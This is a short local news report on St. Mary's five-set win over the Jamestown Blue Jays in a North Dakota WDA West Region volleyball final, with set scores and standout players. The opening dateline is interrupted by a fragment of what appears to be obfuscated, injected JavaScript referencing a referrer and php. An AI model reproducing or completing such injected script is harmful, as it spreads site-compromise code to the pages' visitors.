JAMESTOWN nzhfi|var|u0026u|referrer|yksss||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- It took five sets but St. Mary’s was able to unseat the Jamestown Blue Jays as the top-team in the WDA. The Jays rallied from a 2-0 deficit to force a fifth game, but couldn’t finish off the comeback. Saints were outscored by 18 points in the match, but still won 3-2 (25-23, 25-22, 13-25, 12-25, 15-13).

Jamestown hadn’t lost in 24 matches heading into Saturday’s West Region Championship match and had only lost five sets in 18 WDA contests including the first two in the tournament this weekend.

The Saints were able to take the first two sets due to some fantastic back row play that didn’t allow many balls to hit the ground. In the second set, the Jays lead 21-17 but St. Mary’s scored eight of the last nine points to grab the victory. Two costly serve errors during that stretch cost the Jays.

Jamestown came out in the third and fourth sets refocused and dominated from start to finish. Addie Eamon and Jenna Stilwell lead the charge hitting rocket after rocket over the net. The Jays outscored the Saints 50-25 in those two sets.

The teams traded points in the fifth set and the game was tied at nine before St. Mary’s was able to put some distance between them and the Jays. They took a 14-11 lead and after two points from Jamestown it ended when Becca Hilgemann’s tip went into the net.

For St. Mary’s its their first ever WDA Tournament Championship and they will be the West No. 1-seed in next week’s state tournament. The Saints will play Fargo South at 6pm on Thursday in Minot.
